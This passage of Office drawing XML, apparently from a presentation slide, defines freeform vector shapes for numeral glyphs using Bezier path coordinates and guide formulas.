                <a:gd name="T5" fmla="*/ 194 h 194"/>
                <a:gd name="T6" fmla="*/ 15 w 110"/>
                <a:gd name="T7" fmla="*/ 175 h 194"/>
                <a:gd name="T8" fmla="*/ 0 w 110"/>
                <a:gd name="T9" fmla="*/ 117 h 194"/>
                <a:gd name="T10" fmla="*/ 0 w 110"/>
                <a:gd name="T11" fmla="*/ 77 h 194"/>
                <a:gd name="T12" fmla="*/ 15 w 110"/>
                <a:gd name="T13" fmla="*/ 19 h 194"/>
                <a:gd name="T14" fmla="*/ 55 w 110"/>
                <a:gd name="T15" fmla="*/ 0 h 194"/>
                <a:gd name="T16" fmla="*/ 95 w 110"/>
                <a:gd name="T17" fmla="*/ 19 h 194"/>
                <a:gd name="T18" fmla="*/ 110 w 110"/>
                <a:gd name="T19" fmla="*/ 77 h 194"/>
                <a:gd name="T20" fmla="*/ 110 w 110"/>
                <a:gd name="T21" fmla="*/ 117 h 194"/>
                <a:gd name="T22" fmla="*/ 74 w 110"/>
                <a:gd name="T23" fmla="*/ 73 h 194"/>
                <a:gd name="T24" fmla="*/ 69 w 110"/>
                <a:gd name="T25" fmla="*/ 40 h 194"/>
                <a:gd name="T26" fmla="*/ 55 w 110"/>
                <a:gd name="T27" fmla="*/ 30 h 194"/>
                <a:gd name="T28" fmla="*/ 55 w 110"/>
                <a:gd name="T29" fmla="*/ 30 h 194"/>
                <a:gd name="T30" fmla="*/ 41 w 110"/>
                <a:gd name="T31" fmla="*/ 40 h 194"/>
                <a:gd name="T32" fmla="*/ 37 w 110"/>
                <a:gd name="T33" fmla="*/ 73 h 194"/>
                <a:gd name="T34" fmla="*/ 37 w 110"/>
                <a:gd name="T35" fmla="*/ 120 h 194"/>
                <a:gd name="T36" fmla="*/ 41 w 110"/>
                <a:gd name="T37" fmla="*/ 154 h 194"/>
                <a:gd name="T38" fmla="*/ 55 w 110"/>
                <a:gd name="T39" fmla="*/ 164 h 194"/>
                <a:gd name="T40" fmla="*/ 56 w 110"/>
                <a:gd name="T41" fmla="*/ 164 h 194"/>
                <a:gd name="T42" fmla="*/ 69 w 110"/>
                <a:gd name="T43" fmla="*/ 154 h 194"/>
                <a:gd name="T44" fmla="*/ 74 w 110"/>
                <a:gd name="T45" fmla="*/ 120 h 194"/>
                <a:gd name="T46" fmla="*/ 74 w 110"/>
                <a:gd name="T47" fmla="*/ 7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0" h="194">
                  <a:moveTo>
                    <a:pt x="110" y="117"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="110" y="143"/>
                    <a:pt x="105" y="162"/>
                    <a:pt x="95" y="175"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="85" y="188"/>
                    <a:pt x="72" y="194"/>
                    <a:pt x="55" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="194"/>
                    <a:pt x="25" y="188"/>
                    <a:pt x="15" y="175"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="162"/>
                    <a:pt x="0" y="143"/>
                    <a:pt x="0" y="11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2"/>
                    <a:pt x="15" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="6"/>
                    <a:pt x="38" y="0"/>
                    <a:pt x="55" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="0"/>
                    <a:pt x="85" y="6"/>
                    <a:pt x="95" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="105" y="32"/>
                    <a:pt x="110" y="52"/>
                    <a:pt x="110" y="77"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="110" y="117"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="74" y="73"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="74" y="58"/>
                    <a:pt x="72" y="47"/>
                    <a:pt x="69" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="33"/>
                    <a:pt x="61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49" y="30"/>
                    <a:pt x="44" y="33"/>
                    <a:pt x="41" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="47"/>
                    <a:pt x="37" y="58"/>
                    <a:pt x="37" y="73"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="120"/>
                    <a:pt x="37" y="120"/>
                    <a:pt x="37" y="120"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="136"/>
                    <a:pt x="38" y="147"/>
                    <a:pt x="41" y="154"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="161"/>
                    <a:pt x="49" y="164"/>
                    <a:pt x="55" y="16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1" y="164"/>
                    <a:pt x="66" y="161"/>
                    <a:pt x="69" y="154"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="147"/>
                    <a:pt x="74" y="136"/>
                    <a:pt x="74" y="120"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="74" y="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0" name="Freeform 40">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F99883ED-E447-444F-9897-8D1BB0715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6284" y="2194731"/>
              <a:ext cx="91025" cy="240867"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 65 w 65"/>
                <a:gd name="T1" fmla="*/ 172 h 172"/>
                <a:gd name="T2" fmla="*/ 31 w 65"/>
                <a:gd name="T3" fmla="*/ 172 h 172"/>
                <a:gd name="T4" fmla="*/ 31 w 65"/>
                <a:gd name="T5" fmla="*/ 36 h 172"/>
                <a:gd name="T6" fmla="*/ 0 w 65"/>
                <a:gd name="T7" fmla="*/ 37 h 172"/>
                <a:gd name="T8" fmla="*/ 0 w 65"/>
                <a:gd name="T9" fmla="*/ 12 h 172"/>
                <a:gd name="T10" fmla="*/ 65 w 65"/>
                <a:gd name="T11" fmla="*/ 0 h 172"/>
                <a:gd name="T12" fmla="*/ 65 w 65"/>
                <a:gd name="T13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172">
                  <a:moveTo>
                    <a:pt x="65" y="172"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="31" y="172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="31" y="36"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="37"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="12"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65" y="17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1" name="Freeform 47">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17699652-4F44-44CD-B941-B61CA32184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43055" y="2953931"/>
              <a:ext cx="140038" cy="246469"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 111 w 111"/>
                <a:gd name="T1" fmla="*/ 117 h 194"/>
                <a:gd name="T2" fmla="*/ 96 w 111"/>
                <a:gd name="T3" fmla="*/ 175 h 194"/>
                <a:gd name="T4" fmla="*/ 56 w 111"/>
                <a:gd name="T5" fmla="*/ 194 h 194"/>
                <a:gd name="T6" fmla="*/ 15 w 111"/>
                <a:gd name="T7" fmla="*/ 175 h 194"/>
                <a:gd name="T8" fmla="*/ 0 w 111"/>
                <a:gd name="T9" fmla="*/ 117 h 194"/>
                <a:gd name="T10" fmla="*/ 0 w 111"/>
                <a:gd name="T11" fmla="*/ 77 h 194"/>
                <a:gd name="T12" fmla="*/ 15 w 111"/>
                <a:gd name="T13" fmla="*/ 19 h 194"/>
                <a:gd name="T14" fmla="*/ 55 w 111"/>
                <a:gd name="T15" fmla="*/ 0 h 194"/>
                <a:gd name="T16" fmla="*/ 96 w 111"/>
                <a:gd name="T17" fmla="*/ 19 h 194"/>
                <a:gd name="T18" fmla="*/ 111 w 111"/>
                <a:gd name="T19" fmla="*/ 77 h 194"/>
                <a:gd name="T20" fmla="*/ 111 w 111"/>
                <a:gd name="T21" fmla="*/ 117 h 194"/>
                <a:gd name="T22" fmla="*/ 74 w 111"/>
                <a:gd name="T23" fmla="*/ 73 h 194"/>
                <a:gd name="T24" fmla="*/ 69 w 111"/>
                <a:gd name="T25" fmla="*/ 40 h 194"/>
                <a:gd name="T26" fmla="*/ 56 w 111"/>
                <a:gd name="T27" fmla="*/ 30 h 194"/>
                <a:gd name="T28" fmla="*/ 55 w 111"/>
                <a:gd name="T29" fmla="*/ 30 h 194"/>
                <a:gd name="T30" fmla="*/ 42 w 111"/>
                <a:gd name="T31" fmla="*/ 40 h 194"/>
                <a:gd name="T32" fmla="*/ 37 w 111"/>
                <a:gd name="T33" fmla="*/ 73 h 194"/>
                <a:gd name="T34" fmla="*/ 37 w 111"/>
                <a:gd name="T35" fmla="*/ 120 h 194"/>
                <a:gd name="T36" fmla="*/ 42 w 111"/>
                <a:gd name="T37" fmla="*/ 154 h 194"/>
                <a:gd name="T38" fmla="*/ 55 w 111"/>
                <a:gd name="T39" fmla="*/ 164 h 194"/>
                <a:gd name="T40" fmla="*/ 56 w 111"/>
                <a:gd name="T41" fmla="*/ 164 h 194"/>
                <a:gd name="T42" fmla="*/ 69 w 111"/>
                <a:gd name="T43" fmla="*/ 154 h 194"/>
                <a:gd name="T44" fmla="*/ 74 w 111"/>
                <a:gd name="T45" fmla="*/ 120 h 194"/>
                <a:gd name="T46" fmla="*/ 74 w 111"/>
                <a:gd name="T47" fmla="*/ 7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1" h="194">
                  <a:moveTo>
                    <a:pt x="111" y="117"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="111" y="142"/>
                    <a:pt x="106" y="162"/>
                    <a:pt x="96" y="175"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="86" y="188"/>
                    <a:pt x="72" y="194"/>
                    <a:pt x="56" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="194"/>
                    <a:pt x="25" y="188"/>
                    <a:pt x="15" y="175"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="162"/>
                    <a:pt x="0" y="142"/>
                    <a:pt x="0" y="11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2"/>
                    <a:pt x="15" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="6"/>
                    <a:pt x="38" y="0"/>
                    <a:pt x="55" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="0"/>
                    <a:pt x="86" y="6"/>
                    <a:pt x="96" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="32"/>
                    <a:pt x="111" y="52"/>
                    <a:pt x="111" y="77"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="111" y="117"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="74" y="73"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="74" y="58"/>
                    <a:pt x="72" y="47"/>
                    <a:pt x="69" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="33"/>
                    <a:pt x="61" y="30"/>
                    <a:pt x="56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49" y="30"/>
                    <a:pt x="45" y="33"/>
                    <a:pt x="42" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="47"/>
                    <a:pt x="37" y="58"/>
                    <a:pt x="37" y="73"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="120"/>
                    <a:pt x="37" y="120"/>
                    <a:pt x="37" y="120"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="136"/>
                    <a:pt x="38" y="147"/>
                    <a:pt x="42" y="154"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="161"/>
                    <a:pt x="49" y="164"/>
                    <a:pt x="55" y="16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2" y="164"/>
                    <a:pt x="66" y="161"/>
                    <a:pt x="69" y="154"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="147"/>
                    <a:pt x="74" y="136"/>
                    <a:pt x="74" y="120"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="74" y="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2" name="Freeform 48">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78B22674-DC16-4F18-BA04-87809463C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6900" y="2953931"/>
              <a:ext cx="145640" cy="243668"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 115 w 115"/>
                <a:gd name="T1" fmla="*/ 191 h 191"/>
                <a:gd name="T2" fmla="*/ 3 w 115"/>
                <a:gd name="T3" fmla="*/ 191 h 191"/>
                <a:gd name="T4" fmla="*/ 3 w 115"/>
                <a:gd name="T5" fmla="*/ 166 h 191"/>
                <a:gd name="T6" fmla="*/ 55 w 115"/>
                <a:gd name="T7" fmla="*/ 101 h 191"/>
                <a:gd name="T8" fmla="*/ 69 w 115"/>
                <a:gd name="T9" fmla="*/ 76 h 191"/>
                <a:gd name="T10" fmla="*/ 74 w 115"/>
                <a:gd name="T11" fmla="*/ 56 h 191"/>
                <a:gd name="T12" fmla="*/ 69 w 115"/>
                <a:gd name="T13" fmla="*/ 36 h 191"/>
                <a:gd name="T14" fmla="*/ 56 w 115"/>
                <a:gd name="T15" fmla="*/ 29 h 191"/>
                <a:gd name="T16" fmla="*/ 42 w 115"/>
                <a:gd name="T17" fmla="*/ 38 h 191"/>
                <a:gd name="T18" fmla="*/ 37 w 115"/>
                <a:gd name="T19" fmla="*/ 62 h 191"/>
                <a:gd name="T20" fmla="*/ 1 w 115"/>
                <a:gd name="T21" fmla="*/ 62 h 191"/>
                <a:gd name="T22" fmla="*/ 1 w 115"/>
                <a:gd name="T23" fmla="*/ 61 h 191"/>
                <a:gd name="T24" fmla="*/ 15 w 115"/>
                <a:gd name="T25" fmla="*/ 17 h 191"/>
                <a:gd name="T26" fmla="*/ 56 w 115"/>
                <a:gd name="T27" fmla="*/ 0 h 191"/>
                <a:gd name="T28" fmla="*/ 96 w 115"/>
                <a:gd name="T29" fmla="*/ 15 h 191"/>
                <a:gd name="T30" fmla="*/ 111 w 115"/>
                <a:gd name="T31" fmla="*/ 56 h 191"/>
                <a:gd name="T32" fmla="*/ 103 w 115"/>
                <a:gd name="T33" fmla="*/ 88 h 191"/>
                <a:gd name="T34" fmla="*/ 75 w 115"/>
                <a:gd name="T35" fmla="*/ 127 h 191"/>
                <a:gd name="T36" fmla="*/ 51 w 115"/>
                <a:gd name="T37" fmla="*/ 162 h 191"/>
                <a:gd name="T38" fmla="*/ 115 w 115"/>
                <a:gd name="T39" fmla="*/ 162 h 191"/>
                <a:gd name="T40" fmla="*/ 115 w 115"/>
                <a:gd name="T41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91">
                  <a:moveTo>
                    <a:pt x="115" y="191"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="191"/>
                    <a:pt x="3" y="191"/>
                    <a:pt x="3" y="191"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="166"/>
                    <a:pt x="3" y="166"/>
                    <a:pt x="3" y="166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61" y="91"/>
                    <a:pt x="66" y="83"/>
                    <a:pt x="69" y="76"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="68"/>
                    <a:pt x="74" y="62"/>
                    <a:pt x="74" y="56"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="74" y="48"/>
                    <a:pt x="72" y="41"/>
                    <a:pt x="69" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="32"/>
                    <a:pt x="61" y="29"/>
                    <a:pt x="56" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="29"/>
                    <a:pt x="45" y="32"/>
                    <a:pt x="42" y="38"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="44"/>
                    <a:pt x="37" y="52"/>
                    <a:pt x="37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0" y="44"/>
                    <a:pt x="5" y="29"/>
                    <a:pt x="15" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="6"/>
                    <a:pt x="39" y="0"/>
                    <a:pt x="56" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="0"/>
                    <a:pt x="86" y="5"/>
                    <a:pt x="96" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="25"/>
                    <a:pt x="111" y="38"/>
                    <a:pt x="111" y="56"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="111" y="67"/>
                    <a:pt x="108" y="78"/>
                    <a:pt x="103" y="88"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="98"/>
                    <a:pt x="88" y="111"/>
                    <a:pt x="75" y="127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115" y="162"/>
                    <a:pt x="115" y="162"/>
                    <a:pt x="115" y="162"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="115" y="19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3" name="Freeform 43">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07E085E4-2C2B-4EB8-8161-6D497633E9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22327" y="4476531"/>
              <a:ext cx="140038" cy="247869"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 110 w 110"/>
                <a:gd name="T1" fmla="*/ 118 h 195"/>
                <a:gd name="T2" fmla="*/ 95 w 110"/>
                <a:gd name="T3" fmla="*/ 175 h 195"/>
                <a:gd name="T4" fmla="*/ 55 w 110"/>
                <a:gd name="T5" fmla="*/ 195 h 195"/>
                <a:gd name="T6" fmla="*/ 15 w 110"/>
                <a:gd name="T7" fmla="*/ 175 h 195"/>
                <a:gd name="T8" fmla="*/ 0 w 110"/>
                <a:gd name="T9" fmla="*/ 118 h 195"/>
                <a:gd name="T10" fmla="*/ 0 w 110"/>
                <a:gd name="T11" fmla="*/ 77 h 195"/>
                <a:gd name="T12" fmla="*/ 15 w 110"/>
                <a:gd name="T13" fmla="*/ 20 h 195"/>
                <a:gd name="T14" fmla="*/ 55 w 110"/>
                <a:gd name="T15" fmla="*/ 0 h 195"/>
                <a:gd name="T16" fmla="*/ 95 w 110"/>
                <a:gd name="T17" fmla="*/ 20 h 195"/>
                <a:gd name="T18" fmla="*/ 110 w 110"/>
                <a:gd name="T19" fmla="*/ 77 h 195"/>
                <a:gd name="T20" fmla="*/ 110 w 110"/>
                <a:gd name="T21" fmla="*/ 118 h 195"/>
                <a:gd name="T22" fmla="*/ 73 w 110"/>
                <a:gd name="T23" fmla="*/ 74 h 195"/>
                <a:gd name="T24" fmla="*/ 69 w 110"/>
                <a:gd name="T25" fmla="*/ 41 h 195"/>
                <a:gd name="T26" fmla="*/ 55 w 110"/>
                <a:gd name="T27" fmla="*/ 31 h 195"/>
                <a:gd name="T28" fmla="*/ 54 w 110"/>
                <a:gd name="T29" fmla="*/ 31 h 195"/>
                <a:gd name="T30" fmla="*/ 41 w 110"/>
                <a:gd name="T31" fmla="*/ 41 h 195"/>
                <a:gd name="T32" fmla="*/ 36 w 110"/>
                <a:gd name="T33" fmla="*/ 74 h 195"/>
                <a:gd name="T34" fmla="*/ 36 w 110"/>
                <a:gd name="T35" fmla="*/ 121 h 195"/>
                <a:gd name="T36" fmla="*/ 41 w 110"/>
                <a:gd name="T37" fmla="*/ 155 h 195"/>
                <a:gd name="T38" fmla="*/ 55 w 110"/>
                <a:gd name="T39" fmla="*/ 164 h 195"/>
                <a:gd name="T40" fmla="*/ 55 w 110"/>
                <a:gd name="T41" fmla="*/ 164 h 195"/>
                <a:gd name="T42" fmla="*/ 69 w 110"/>
                <a:gd name="T43" fmla="*/ 155 h 195"/>
                <a:gd name="T44" fmla="*/ 73 w 110"/>
                <a:gd name="T45" fmla="*/ 121 h 195"/>
                <a:gd name="T46" fmla="*/ 73 w 110"/>
                <a:gd name="T47" fmla="*/ 7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0" h="195">
                  <a:moveTo>
                    <a:pt x="110" y="118"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="110" y="143"/>
                    <a:pt x="105" y="162"/>
                    <a:pt x="95" y="175"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="85" y="188"/>
                    <a:pt x="72" y="195"/>
                    <a:pt x="55" y="195"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="195"/>
                    <a:pt x="25" y="188"/>
                    <a:pt x="15" y="175"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="162"/>
                    <a:pt x="0" y="143"/>
                    <a:pt x="0" y="118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3"/>
                    <a:pt x="15" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="7"/>
                    <a:pt x="38" y="0"/>
                    <a:pt x="55" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="0"/>
                    <a:pt x="85" y="7"/>
                    <a:pt x="95" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="105" y="33"/>
                    <a:pt x="110" y="52"/>
                    <a:pt x="110" y="77"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="110" y="118"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="73" y="74"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="59"/>
                    <a:pt x="72" y="48"/>
                    <a:pt x="69" y="41"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="34"/>
                    <a:pt x="61" y="30"/>
                    <a:pt x="55" y="31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49" y="30"/>
                    <a:pt x="44" y="34"/>
                    <a:pt x="41" y="41"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="48"/>
                    <a:pt x="36" y="59"/>
                    <a:pt x="36" y="74"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="121"/>
                    <a:pt x="36" y="121"/>
                    <a:pt x="36" y="121"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="136"/>
                    <a:pt x="38" y="148"/>
                    <a:pt x="41" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="162"/>
                    <a:pt x="49" y="165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61" y="165"/>
                    <a:pt x="66" y="162"/>
                    <a:pt x="69" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="148"/>
                    <a:pt x="73" y="136"/>
                    <a:pt x="73" y="121"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="73" y="7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4" name="Freeform 44">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CB63913-DC3C-42FF-AC9B-483AE0193C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84772" y="4480732"/>
              <a:ext cx="148441" cy="239467"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 92 w 106"/>
                <a:gd name="T1" fmla="*/ 107 h 171"/>
                <a:gd name="T2" fmla="*/ 106 w 106"/>
                <a:gd name="T3" fmla="*/ 107 h 171"/>
                <a:gd name="T4" fmla="*/ 106 w 106"/>
                <a:gd name="T5" fmla="*/ 134 h 171"/>
                <a:gd name="T6" fmla="*/ 92 w 106"/>
                <a:gd name="T7" fmla="*/ 134 h 171"/>
                <a:gd name="T8" fmla="*/ 92 w 106"/>
                <a:gd name="T9" fmla="*/ 171 h 171"/>
                <a:gd name="T10" fmla="*/ 58 w 106"/>
                <a:gd name="T11" fmla="*/ 171 h 171"/>
                <a:gd name="T12" fmla="*/ 58 w 106"/>
                <a:gd name="T13" fmla="*/ 134 h 171"/>
                <a:gd name="T14" fmla="*/ 2 w 106"/>
                <a:gd name="T15" fmla="*/ 134 h 171"/>
                <a:gd name="T16" fmla="*/ 0 w 106"/>
                <a:gd name="T17" fmla="*/ 113 h 171"/>
                <a:gd name="T18" fmla="*/ 58 w 106"/>
                <a:gd name="T19" fmla="*/ 0 h 171"/>
                <a:gd name="T20" fmla="*/ 92 w 106"/>
                <a:gd name="T21" fmla="*/ 0 h 171"/>
                <a:gd name="T22" fmla="*/ 92 w 106"/>
                <a:gd name="T23" fmla="*/ 107 h 171"/>
                <a:gd name="T24" fmla="*/ 30 w 106"/>
                <a:gd name="T25" fmla="*/ 107 h 171"/>
                <a:gd name="T26" fmla="*/ 58 w 106"/>
                <a:gd name="T27" fmla="*/ 107 h 171"/>
                <a:gd name="T28" fmla="*/ 58 w 106"/>
                <a:gd name="T29" fmla="*/ 48 h 171"/>
                <a:gd name="T30" fmla="*/ 58 w 106"/>
                <a:gd name="T31" fmla="*/ 48 h 171"/>
                <a:gd name="T32" fmla="*/ 56 w 106"/>
                <a:gd name="T33" fmla="*/ 51 h 171"/>
                <a:gd name="T34" fmla="*/ 30 w 106"/>
                <a:gd name="T35" fmla="*/ 107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6" h="171">
                  <a:moveTo>
                    <a:pt x="92" y="107"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="106" y="107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106" y="134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92" y="134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92" y="171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58" y="171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58" y="134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2" y="134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92" y="107"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="30" y="107"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="58" y="107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58" y="48"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58" y="48"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56" y="51"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30" y="10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5" name="Freeform 45">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A85398CC-3671-42F6-9759-D8B0FC0DC2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4800" y="5114109"/>
              <a:ext cx="141439" cy="247869"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 111 w 111"/>
                <a:gd name="T1" fmla="*/ 118 h 195"/>
                <a:gd name="T2" fmla="*/ 96 w 111"/>
                <a:gd name="T3" fmla="*/ 175 h 195"/>
                <a:gd name="T4" fmla="*/ 55 w 111"/>
                <a:gd name="T5" fmla="*/ 195 h 195"/>
                <a:gd name="T6" fmla="*/ 15 w 111"/>
                <a:gd name="T7" fmla="*/ 175 h 195"/>
                <a:gd name="T8" fmla="*/ 0 w 111"/>
                <a:gd name="T9" fmla="*/ 118 h 195"/>
                <a:gd name="T10" fmla="*/ 0 w 111"/>
                <a:gd name="T11" fmla="*/ 77 h 195"/>
                <a:gd name="T12" fmla="*/ 15 w 111"/>
                <a:gd name="T13" fmla="*/ 20 h 195"/>
                <a:gd name="T14" fmla="*/ 55 w 111"/>
                <a:gd name="T15" fmla="*/ 0 h 195"/>
                <a:gd name="T16" fmla="*/ 96 w 111"/>
                <a:gd name="T17" fmla="*/ 20 h 195"/>
                <a:gd name="T18" fmla="*/ 111 w 111"/>
                <a:gd name="T19" fmla="*/ 77 h 195"/>
                <a:gd name="T20" fmla="*/ 111 w 111"/>
                <a:gd name="T21" fmla="*/ 118 h 195"/>
                <a:gd name="T22" fmla="*/ 74 w 111"/>
                <a:gd name="T23" fmla="*/ 74 h 195"/>
                <a:gd name="T24" fmla="*/ 69 w 111"/>
                <a:gd name="T25" fmla="*/ 41 h 195"/>
                <a:gd name="T26" fmla="*/ 56 w 111"/>
                <a:gd name="T27" fmla="*/ 31 h 195"/>
                <a:gd name="T28" fmla="*/ 55 w 111"/>
                <a:gd name="T29" fmla="*/ 31 h 195"/>
                <a:gd name="T30" fmla="*/ 41 w 111"/>
                <a:gd name="T31" fmla="*/ 41 h 195"/>
                <a:gd name="T32" fmla="*/ 37 w 111"/>
                <a:gd name="T33" fmla="*/ 74 h 195"/>
                <a:gd name="T34" fmla="*/ 37 w 111"/>
